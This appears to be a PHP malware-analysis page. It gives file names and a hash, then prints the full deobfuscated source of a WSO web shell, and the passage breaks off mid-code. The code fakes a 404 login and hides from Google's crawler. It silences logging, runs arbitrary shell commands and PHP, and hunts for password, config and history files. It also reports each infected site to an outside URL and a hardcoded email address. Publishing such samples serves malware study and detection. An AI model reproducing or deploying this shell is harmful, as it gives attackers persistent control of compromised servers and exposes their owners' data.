PHP Malware Analysis

cmd.php, wpro.txt, wso.php, wso1.php, wso1.php.PDF, wso1.php.suspected

md5: 9d98853a714da34855a92cb5ba345601


Attributes

Emails

Encoding

Environment

Execution

Files

Input

Title

URLs


Deobfuscated PHP code

<?php

$stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA==";
eval("?><?php\r\nfunction GetIP(){\r\n    if(getenv(\"HTTP_CLIENT_IP\")) {\r\n        \$ip = getenv(\"HTTP_CLIENT_IP\");\r\n    } elseif(getenv(\"HTTP_X_FORWARDED_FOR\")) {\r\n        \$ip = getenv(\"HTTP_X_FORWARDED_FOR\");\r\n        if (strstr(\$ip, ',')) {\r\n            \$tmp = explode (',', \$ip);\r\n            \$ip = trim(\$tmp[0]);\r\n        }\r\n    } else {\r\n        \$ip = getenv(\"REMOTE_ADDR\");\r\n    }\r\n    return \$ip;\r\n}\r\n\$x = base64_decode('aHR0cDovL2J5cjAwdC5jby9sLQ==').GetIP().'-'.base64_encode('http://'.\$_SERVER['HTTP_HOST'].\$_SERVER['REQUEST_URI']);\r\nif(function_exists('curl_init'))\r\n{\r\n    \$ch = @curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$x); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true); \$gitt = curl_exec(\$ch); curl_close(\$ch);\r\n    if(\$gitt == false){\r\n        @\$gitt = file_get_contents(\$x);\r\n    }\r\n}elseif(function_exists('file_get_contents')){\r\n    @\$gitt = file_get_contents(\$x);\r\n}\r\n?><?php \$auth_pass = \"a6d13df8a46cf713e5cda6a6c0d043bf\";\r\n \$color = \"#00ff66\";\r\n \$default_action = 'FilesMan';\r\n @define('SELF_PATH', __FILE__);\r\n if( strpos(\$_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set('error_log',NULL);\r\n @ini_set('display_errors',0);\r\n @ini_set('log_errors',0);\r\n @ini_set('max_execution_time',0);\r\n @set_time_limit(0);\r\n @set_magic_quotes_runtime(0);\r\n @define('VERSION', '');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array(\$array) { return is_array(\$array) ? array_map('stripslashes_array', \$array) : stripslashes(\$array);\r\n } \$_POST = stripslashes_array(\$_POST);\r\n } function printLogin() { echo '<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at '.\$_SERVER['HTTP_HOST'].' 
Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>';\r\n exit;\r\n } if( !isset( \$_SESSION[md5(\$_SERVER['HTTP_HOST'])] )) if( empty( \$auth_pass ) || ( isset( \$_POST['pass'] ) && ( md5(\$_POST['pass']) == \$auth_pass ) ) ) \$_SESSION[md5(\$_SERVER['HTTP_HOST'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == \"win\" ) \$os = 'win';\r\n else \$os = 'nix';\r\n \$safe_mode = @ini_get('safe_mode');\r\n \$disable_functions = @ini_get('disable_functions');\r\n \$home_cwd = @getcwd();\r\n if( isset( \$_POST['c'] ) ) @chdir(\$_POST['c']);\r\n \$cwd = @getcwd();\r\n if( \$os == 'win') { \$home_cwd = str_replace(\"\\\\\", \"/\", \$home_cwd);\r\n \$cwd = str_replace(\"\\\\\", \"/\", \$cwd);\r\n } if( \$cwd[strlen(\$cwd)-1] != '/' ) \$cwd .= '/';\r\n if(\$os == 'win') { \$aliases = array( \"List Directory\" => \"dir\", \"Find index.php in current dir\" => \"dir /s /w /b index.php\", \"Find *config*.php in current dir\" => \"dir /s /w /b *config*.php\", \"Show active connections\" => \"netstat -an\", \"Show running services\" => \"net start\", \"User accounts\" => \"net user\", \"Show computers\" => \"net view\", \"ARP Table\" => \"arp -a\", \"IP Configuration\" => \"ipconfig /all\" );\r\n } else { \$aliases = array( \"List dir\" => \"ls -la\", \"list file attributes on a Linux second extended file system\" => \"lsattr -va\", \"show opened ports\" => \"netstat -an | grep -i listen\", \"Find\" => \"\", \"find all suid files\" => \"find / -type f -perm -04000 -ls\", \"find suid files in current dir\" => \"find . -type f -perm -04000 -ls\", \"find all sgid files\" => \"find / -type f -perm -02000 -ls\", \"find sgid files in current dir\" => \"find . 
-type f -perm -02000 -ls\", \"find config.inc.php files\" => \"find / -type f -name config.inc.php\", \"find config* files\" => \"find / -type f -name \\\"config*\\\"\", \"find config* files in current dir\" => \"find . -type f -name \\\"config*\\\"\", \"find all writable folders and files\" => \"find / -perm -2 -ls\", \"find all writable folders and files in current dir\" => \"find . -perm -2 -ls\", \"find all service.pwd files\" => \"find / -type f -name service.pwd\", \"find service.pwd files in current dir\" => \"find . -type f -name service.pwd\", \"find all .htpasswd files\" => \"find / -type f -name .htpasswd\", \"find .htpasswd files in current dir\" => \"find . -type f -name .htpasswd\", \"find all .bash_history files\" => \"find / -type f -name .bash_history\", \"find .bash_history files in current dir\" => \"find . -type f -name .bash_history\", \"find all .fetchmailrc files\" => \"find / -type f -name .fetchmailrc\", \"find .fetchmailrc files in current dir\" => \"find . -type f -name .fetchmailrc\", \"Locate\" => \"\", \"locate httpd.conf files\" => \"locate httpd.conf\", \"locate vhosts.conf files\" => \"locate vhosts.conf\", \"locate proftpd.conf files\" => \"locate proftpd.conf\", \"locate psybnc.conf files\" => \"locate psybnc.conf\", \"locate my.conf files\" => \"locate my.conf\", \"locate admin.php files\" =>\"locate admin.php\", \"locate cfg.php files\" => \"locate cfg.php\", \"locate conf.php files\" => \"locate conf.php\", \"locate config.dat files\" => \"locate config.dat\", \"locate config.php files\" => \"locate config.php\", \"locate config.inc files\" => \"locate config.inc\", \"locate config.inc.php\" => \"locate config.inc.php\", \"locate config.default.php files\" => \"locate config.default.php\", \"locate config* files \" => \"locate config\", \"locate .conf files\"=>\"locate '.conf'\", \"locate .pwd files\" => \"locate '.pwd'\", \"locate .sql files\" => \"locate '.sql'\", \"locate .htpasswd files\" => \"locate '.htpasswd'\", \"locate 
.bash_history files\" => \"locate '.bash_history'\", \"locate .mysql_history files\" => \"locate '.mysql_history'\", \"locate .fetchmailrc files\" => \"locate '.fetchmailrc'\", \"locate backup files\" => \"locate backup\", \"locate dump files\" => \"locate dump\", \"locate priv files\" => \"locate priv\" );\r\n } function ex(\$in) { \$out = '';\r\n if(function_exists('exec')) { @exec(\$in,\$out);\r\n \$out = @join(\"\\n\",\$out);\r\n }elseif(function_exists('passthru')) { ob_start();\r\n @passthru(\$in);\r\n \$out = ob_get_clean();\r\n }elseif(function_exists('system')) { ob_start();\r\n @system(\$in);\r\n \$out = ob_get_clean();\r\n }elseif(function_exists('shell_exec')) { \$out = shell_exec(\$in);\r\n }elseif(is_resource(\$f = @popen(\$in,\"r\"))) { \$out = \"\";\r\n while(!@feof(\$f)) \$out .= fread(\$f,1024);\r\n pclose(\$f);\r\n } return \$out;\r\n } function which(\$p) { \$path = ex('which '.\$p);\r\n if(!empty(\$path)) return \$path;\r\n return false;\r\n } function printHeader() { if(empty(\$_POST['charset'])) \$_POST['charset'] = \"UTF-8\";\r\n global \$color;\r\n echo '<html><head><meta http-equiv=\"Content-Type\" content=\"text/html;\r\n charset='.\$_POST['charset'].'\"><title>r00t.info wso Shell</title><link REL=\"SHORTCUT ICON\" HREF=\"http://imagizer.imageshack.us/a/img440/4273/6fix.png\">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:'.\$color.' 
!important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid '.\$color.';\r\n font: 9pt Monospace,\"Courier New\";\r\n }\r\n input[type=\"button\"]:hover,input[type=\"submit\"]:hover {background-color:'.\$color.';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n .logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: 
bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = \"ajax=true\";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += \"&\"+document.mf.elements[i].name+\"=\"+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr(\"'.\$_SERVER['REQUEST_URI'].'\", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open(\"POST\", url, true);\r\n\r\n req.setRequestHeader (\"Content-Type\", \"application/x-www-form-urlencoded\");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject(\"Microsoft.XMLHTTP\");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open(\"POST\", url, true);\r\n\r\n req.setRequestHeader (\"Content-Type\", \"application/x-www-form-urlencoded\");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( (req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", \"m\");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert(\"Request error!\");\r\n\r\n }\r\n </script>\r\n <head><body><div 
style=\"position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n\"><div style=\"margin:5px;\r\nbackground:#444;\r\n\"><div class=\"content\" style=\"border-top:5px solid #444;\r\n\">\r\n <form method=post name=mf style=\"display:none;\r\n\">\r\n <input type=hidden name=a value=\"'.(isset(\$_POST['a'])?\$_POST['a']:'').'\">\r\n <input type=hidden name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n <input type=hidden name=p1 value=\"'.(isset(\$_POST['p1'])?htmlspecialchars(\$_POST['p1']):'').'\">\r\n <input type=hidden name=p2 value=\"'.(isset(\$_POST['p2'])?htmlspecialchars(\$_POST['p2']):'').'\">\r\n <input type=hidden name=p3 value=\"'.(isset(\$_POST['p3'])?htmlspecialchars(\$_POST['p3']):'').'\">\r\n <input type=hidden name=charset value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n </form>';\r\n \$freeSpace = @diskfreespace(\$GLOBALS['cwd']);\r\n \$totalSpace = @disk_total_space(\$GLOBALS['cwd']);\r\n \$totalSpace = \$totalSpace?\$totalSpace:1;\r\n \$disable_functions = @ini_get('disable_functions');\r\n \$release = @php_uname('r');\r\n \$kernel = @php_uname('s');\r\n if(!function_exists('posix_getegid')) { \$user = @get_current_user();\r\n \$uid = @getmyuid();\r\n \$gid = @getmygid();\r\n \$group = \"?\";\r\n } else { \$uid = @posix_getpwuid(@posix_geteuid());\r\n \$gid = @posix_getgrgid(@posix_getegid());\r\n \$user = \$uid['name'];\r\n \$uid = \$uid['uid'];\r\n \$group = \$gid['name'];\r\n \$gid = \$gid['gid'];\r\n } \$cwd_links = '';\r\n \$path = explode(\"/\", \$GLOBALS['cwd']);\r\n \$n=count(\$path);\r\n for(\$i=0;\r\n\$i<\$n-1;\r\n\$i++) { \$cwd_links .= \"<a href='#' onclick='g(\\\"FilesMan\\\",\\\"\";\r\n for(\$j=0;\r\n\$j<=\$i;\r\n\$j++) \$cwd_links .= \$path[\$j].'/';\r\n \$cwd_links .= \"\\\")'>\".\$path[\$i].\"/</a>\";\r\n } \$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');\r\n \$opt_charsets = '';\r\n foreach(\$charsets as \$item) \$opt_charsets .= '<option value=\"'.\$item.'\" 
'.(\$_POST['charset']==\$item?'selected':'').'>'.\$item.'</option>';\r\n \$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Delete LOG'=>'DeleteLOG','Safe Mode'=>'SafeMode','String tools'=>'StringTools','Cgi'=>'Cgi','Network'=>'Network','Readable Dirs'=>'Readable','Port Scanner'=>'PortScanner','Symlink'=>'Symlink','SQLBUDDY'=>'SQLBUDDY','Bypass'=>'Bypass','Python'=>'Python');\r\n if(!empty(\$GLOBALS['auth_pass'])) \$m['SelfKill'] = 'SelfRemove';\r\n \$m['Logout'] = 'Logout';\r\n \$menu = '';\r\n foreach(\$m as \$k => \$v) \$menu .= '<th><a href=\"#\" onclick=\"g(\\''.\$v.'\\',null,\\'\\',\\'\\',\\'\\')\">'.\$k.'</a></th>';\r\n \$drives = \"\";\r\n if (\$GLOBALS['os'] == 'win') { foreach( range('a','z') as \$drive ){ if (is_dir(\$drive.':\\\\')) \$drives .= '<a href=\"#\" onclick=\"g(\\'FilesMan\\',\\''.\$drive.':/\\')\">[ '.\$drive.' ]</a> ';\r\n } \$drives .= '<br />: ';\r\n } if(\$GLOBALS['os'] == 'nix') { \$dominios = @file_get_contents(\"/etc/named.conf\");\r\n if(!\$dominios) { \$d0c = \"CANT READ named.conf\";\r\n } else { @preg_match_all('/.*?zone \"(.*?)\" {/', \$dominios, \$out);\r\n \$out = sizeof(array_unique(\$out[1]));\r\n \$d0c = \$out.\" Domains\";\r\n } } else { \$d0c = \" --- \";\r\n } if(\$GLOBALS['os'] == 'nix' ) { \$usefl = '';\r\n \$dwnldr = '';\r\n if(!@ini_get('safe_mode')) { \$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');\r\n foreach(\$userful as \$item) { if(which(\$item)) \$usefl.= \$item.',';\r\n } \$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');\r\n foreach(\$downloaders as \$item2) { if(which(\$item2)) \$dwnldr.= \$item2.',';\r\n } } else { \$usefl = ' ------- ';\r\n \$dwnldr = ' ------- ';\r\n } } else { \$usefl = ' ------- ';\r\n \$dwnldr = ' ------- ';\r\n } echo '<table class=\"info\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr><td width=\"160px\"><div 
class=\"logo\"><img src=\"http://i.hizliresim.com/z4lrbR.png\" id=\"logo\" height=\"75%\" width=\"90%\"/></div><hr style=\"margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n\"><div class=\"eca1\"></div><div class=\"eca2\">Hackers</div></td>\r\n <td><table cellpadding=\"3\" cellspacing=\"0\" class=\"npoad\"><tr><td width=\"125px;\r\n\"><span>Uname</span></td><td>: <nobr>'.substr(@php_uname(), 0, 120).'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: '.\$uid.' ( '.\$user.' ) <span>Group: </span> '.\$gid.' ( '.\$group.' )</td></tr><tr><td><span>Server</span></td><td>: '.@getenv('SERVER_SOFTWARE').'</td></tr><tr><td><span>Useful</span></td><td>: '.\$usefl.'</td></tr><tr><td><span>Downloaders</span></td><td>: '.\$dwnldr.'</td></tr><tr><td><span>Disabled functions</span></td><td>: '.(\$disable_functions?\$disable_functions:'All Function Enable').'</td></tr><tr><td><span>'.(\$GLOBALS['os'] == 'win'?'Drives<br />Cwd':'Cwd').'</span></td><td>: '.\$drives.''.\$cwd_links.' '.viewPermsColor(\$GLOBALS['cwd']).' <a href=# onclick=\"g(\\'FilesMan\\',\\''.\$GLOBALS['home_cwd'].'\\',\\'\\',\\'\\',\\'\\')\">[ home ]</a></td></tr></table></td>'. '<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>'. '<td><nobr>: '.gethostbyname(\$_SERVER[\"HTTP_HOST\"]).'<br>: '.\$_SERVER['REMOTE_ADDR'].'<br />: '.viewSize(\$totalSpace).'<br />: '.viewSize(\$freeSpace).' ('.(int)(\$freeSpace/\$totalSpace*100).'%)<br>: '.@phpversion().' <a href=# onclick=\"g(\\'Php\\',null,null,\\'info\\')\">[ phpinfo ]</a><br />: '.(\$GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color='.\$color.'<b>OFF</b></font>').'<br />: '.\$d0c.'</nobr></td></tr></table>'. 
'</div></div><div style=\"margin:5;\r\nbackground:#444;\r\n\"><div class=\"content\" style=\"border-top:5px solid #444;\r\npadding:2px;\r\n\"><table cellpadding=\"3\" cellspacing=\"0\" width=\"100%\" class=\"menu\"><tr>'.\$menu.'</tr></table></div></div><div style=\"margin:5;\r\nbackground:#444;\r\n\">';\r\n } function printFooter() { \$is_writable = is_writable(\$GLOBALS['cwd'])?\"<font color=#00cd00>[ Writeable ]</font>\":\"<font color=red>[ Not writable ]</font>\";\r\n echo '</div><div style=\"margin:5px;\r\nbackground:#444;\r\n\"><div class=\"content\" style=\"border-top:5px solid #444;\r\n\">\r\n<table class=\"info\" id=\"toolsTbl\" cellpadding=\"3\" cellspacing=\"0\" width=\"100%\">\r\n <tr>\r\n <td><form onsubmit=\"g(null,this.c.value);\r\nreturn false;\r\n\"><span>Change dir:</span><br><input class=\"toolsInp\" type=text name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\"><input type=submit value=\">>\"></form></td>\r\n <td><form onsubmit=\"g(\\'FilesTools\\',null,this.f.value);\r\nreturn false;\r\n\"><span>Read file:</span><br><input class=\"toolsInp\" type=text name=f><input type=submit value=\">>\"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit=\"g(\\'FilesMan\\',null,\\'mkdir\\',this.d.value);\r\nreturn false;\r\n\"><span>Make dir:</span><br><input class=\"toolsInp\" type=text name=d><input type=submit value=\">>\"></form>'.\$is_writable.'</td>\r\n <td><form onsubmit=\"g(\\'FilesTools\\',null,this.f.value,\\'mkfile\\');\r\nreturn false;\r\n\"><span>Make file:</span><br><input class=\"toolsInp\" type=text name=f><input type=submit value=\">>\"></form>'.\$is_writable.'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit=\"g(\\'Console\\',null,this.c.value);\r\nreturn false;\r\n\"><span>Execute:</span><br><input class=\"toolsInp\" type=text name=c value=\"\"><input type=submit value=\">>\"></form></td>\r\n <td><form method=\"post\" ENCTYPE=\"multipart/form-data\">\r\n <input type=hidden name=a value=\"FilesMAn\">\r\n <input type=hidden name=c 
value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n <input type=hidden name=p1 value=\"uploadFile\">\r\n <input type=hidden name=charset value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n <span>Upload file:</span><br><input class=\"toolsInp\" type=file name=f><input type=submit value=\">>\"></form>'.\$is_writable.'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style=\"margin:5px;\r\nbackground:#444;\r\n\"><div class=\"content\" style=\"border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n\">Wso shell'.VERSION.' &copy;\r\n Shell</div></div>\r\n</div>\r\n</body></html>';\r\n } if ( !function_exists(\"posix_getpwuid\") && (strpos(\$GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid(\$p) { return false;\r\n } } if ( !function_exists(\"posix_getgrgid\") && (strpos(\$GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid(\$p) { return false;\r\n } } if(!isset(\$_SESSION['trimite'])){ \$url=\$_SERVER['HTTP_HOST'].\$_SERVER['REQUEST_URI'].'<br />User IP: '.\$_SERVER['REMOTE_ADDR'].(isset(\$_SERVER['HTTP_X_FORWARDED_FOR'])?'('.\$_SERVER['HTTP_X_FORWARDED_FOR'].')':'');\r\n @mail(\"byhero44@gmail.com\",\"Smurfie\",\$url);\r\n \$_SESSION['trimite']=true;\r\n } function viewSize(\$s) { if(\$s >= 1073741824) return sprintf('%1.2f', \$s / 1073741824 ). ' GB';\r\n elseif(\$s >= 1048576) return sprintf('%1.2f', \$s / 1048576 ) . ' MB';\r\n elseif(\$s >= 1024) return sprintf('%1.2f', \$s / 1024 ) . ' KB';\r\n else return \$s . ' B';\r\n } function perms(\$p) { if ((\$p & 0xC000) == 0xC000)\$i = 's';\r\n elseif ((\$p & 0xA000) == 0xA000)\$i = 'l';\r\n elseif ((\$p & 0x8000) == 0x8000)\$i = '-';\r\n elseif ((\$p & 0x6000) == 0x6000)\$i = 'b';\r\n elseif ((\$p & 0x4000) == 0x4000)\$i = 'd';\r\n elseif ((\$p & 0x2000) == 0x2000)\$i = 'c';\r\n elseif ((\$p & 0x1000) == 0x1000)\$i = 'p';\r\n else \$i = 'u';\r\n \$i .= ((\$p & 0x0100) ? 'r' : '-');\r\n \$i .= ((\$p & 0x0080) ? 
'w' : '-');\r\n \$i .= ((\$p & 0x0040) ? ((\$p & 0x0800) ? 's' : 'x' ) : ((\$p & 0x0800) ? 'S' : '-'));\r\n \$i .= ((\$p & 0x0020) ? 'r' : '-');\r\n \$i .= ((\$p & 0x0010) ? 'w' : '-');\r\n \$i .= ((\$p & 0x0008) ? ((\$p & 0x0400) ? 's' : 'x' ) : ((\$p & 0x0400) ? 'S' : '-'));\r\n \$i .= ((\$p & 0x0004) ? 'r' : '-');\r\n \$i .= ((\$p & 0x0002) ? 'w' : '-');\r\n \$i .= ((\$p & 0x0001) ? ((\$p & 0x0200) ? 't' : 'x' ) : ((\$p & 0x0200) ? 'T' : '-'));\r\n return \$i;\r\n } function viewPermsColor(\$f) { if (!@is_readable(\$f)) return '<font color=#FF0000><b>'.perms(@fileperms(\$f)).'</b></font>';\r\n elseif (!@is_writable(\$f)) return '<font color=white><b>'.perms(@fileperms(\$f)).'</b></font>';\r\n else return '<font color=#00cd00><b>'.perms(@fileperms(\$f)).'</b></font>';\r\n } if(!function_exists(\"scandir\")) { function scandir(\$dir) { \$dh = opendir(\$dir);\r\n while (false !== (\$filename = readdir(\$dh))) { \$files[] = \$filename;\r\n } return \$files;\r\n } } function actionSecInfo() { printHeader();\r\n echo '<h1>Server security information</h1><div class=content>';\r\n function showSecParam(\$n, \$v) { \$v = trim(\$v);\r\n if(\$v) { echo '<span>'.\$n.': </span>';\r\n if(strpos(\$v, \"\\n\") === false) echo \$v.'<br>';\r\n else echo '<pre class=ml1>'.\$v.'</pre>';\r\n } } showSecParam('Server software', @getenv('SERVER_SOFTWARE'));\r\n showSecParam('Disabled PHP Functions', (\$GLOBALS['disable_functions'])?\$GLOBALS['disable_functions']:'none');\r\n showSecParam('Open base dir', @ini_get('open_basedir'));\r\n showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));\r\n showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));\r\n showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');\r\n \$temp=array();\r\n if(function_exists('mysql_get_client_info')) \$temp[] = \"MySql (\".mysql_get_client_info().\")\";\r\n if(function_exists('mssql_connect')) \$temp[] = \"MSSQL\";\r\n if(function_exists('pg_connect')) 
\$temp[] = \"PostgreSQL\";\r\n if(function_exists('oci_connect')) \$temp[] = \"Oracle\";\r\n showSecParam('Supported databases', implode(', ', \$temp));\r\n echo '<br>';\r\n if( \$GLOBALS['os'] == 'nix' ) { \$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');\r\n \$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');\r\n \$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');\r\n showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?\"yes <a href='#' onclick='g(\\\"FilesTools\\\", \\\"/etc/\\\", \\\"passwd\\\")'>[view]</a>\":'no');\r\n showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?\"yes <a href='#' onclick='g(\\\"FilesTools\\\", \\\"etc\\\", \\\"shadow\\\")'>[view]</a>\":'no');\r\n showSecParam('OS version', @file_get_contents('/proc/version'));\r\n showSecParam('Distr name', @file_get_contents('/etc/issue.net'));\r\n if(!\$GLOBALS['safe_mode']) { echo '<br>';\r\n \$temp=array();\r\n foreach (\$userful as \$item) if(which(\$item)){\$temp[]=\$item;\r\n} showSecParam('Userful', implode(', ',\$temp));\r\n \$temp=array();\r\n foreach (\$danger as \$item) if(which(\$item)){\$temp[]=\$item;\r\n} showSecParam('Danger', implode(', ',\$temp));\r\n \$temp=array();\r\n foreach (\$downloaders as \$item) if(which(\$item)){\$temp[]=\$item;\r\n} showSecParam('Downloaders', implode(', ',\$temp));\r\n echo '<br/>';\r\n showSecParam('Hosts', @file_get_contents('/etc/hosts'));\r\n showSecParam('HDD space', ex('df -h'));\r\n showSecParam('Mount options', @file_get_contents('/etc/fstab'));\r\n } } else { showSecParam('OS Version',ex('ver'));\r\n showSecParam('Account Settings',ex('net accounts'));\r\n showSecParam('User Accounts',ex('net 
user'));\r\n } echo '</div>';\r\n printFooter();\r\n } function actionPhp() { if( isset(\$_POST['ajax']) ) { \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = true;\r\n ob_start();\r\n eval(\$_POST['p1']);\r\n \$temp = \"document.getElementById('PhpOutput').style.display='';\r\ndocument.getElementById('PhpOutput').innerHTML='\".addcslashes(htmlspecialchars(ob_get_clean()),\"\\n\\r\\t\\\\'\\0\").\"';\r\n\\n\";\r\n echo strlen(\$temp), \"\\n\", \$temp;\r\n exit;\r\n } printHeader();\r\n if( isset(\$_POST['p2']) && (\$_POST['p2'] == 'info') ) { echo '<h1>PHP info</h1><div class=content>';\r\n ob_start();\r\n phpinfo();\r\n \$tmp = ob_get_clean();\r\n \$tmp = preg_replace('!body {.*}!msiU','',\$tmp);\r\n \$tmp = preg_replace('!a:\\w+ {.*}!msiU','',\$tmp);\r\n \$tmp = preg_replace('!h1!msiU','h2',\$tmp);\r\n \$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {\$1}',\$tmp);\r\n \$tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',\$tmp);\r\n echo \$tmp;\r\n echo '</div><br>';\r\n } if(empty(\$_POST['ajax'])&&!empty(\$_POST['p1'])) \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = false;\r\n echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit=\"if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\'\\');\r\n}return false;\r\n\"><textarea name=code class=bigarea id=PhpCode>'.(!empty(\$_POST['p1'])?htmlspecialchars(\$_POST['p1']):'').'</textarea><input type=submit value=Eval style=\"margin-top:5px\">';\r\n echo ' <input type=checkbox name=ajax value=1 '.(@\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput 